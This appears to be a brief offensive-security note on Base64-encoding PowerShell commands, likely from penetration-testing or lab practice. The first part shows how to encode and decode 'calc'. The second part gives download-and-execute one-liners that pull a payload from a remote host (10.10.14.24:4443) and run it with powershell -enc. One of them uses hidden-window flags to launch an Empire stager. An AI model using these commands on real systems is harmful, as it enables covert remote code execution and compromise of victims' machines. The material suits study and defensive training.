PowerShell Encode/Decode

image.png

$cmd = "calc"                                                             
$by = [System.Text.Encoding]::Unicode.GetBytes($cmd)                      
$enc_Cmd = [Convert]::ToBase64String($by)                                 
Write-Output $enc_Cmd 

YwBhAGwAYwA=

PS > [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("calc"))
YwBhAGwAYwA=

PS > [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("YwBhAGwAYwA="))
calc

---

• -enc ： -EncodedCommand

# http://10.10.14.24:4443/calc
YwBhAGwAYwA=

powershell -enc (New-Object Net.WebClient).DownloadString("http://10.10.14.24:4443/calc")

powershell -noP -sta -w 1 -enc (New-Object Net.WebClient).DownloadString("http://10.10.14.24:4443/Empire")

---

• Encode and Decode Text as Base64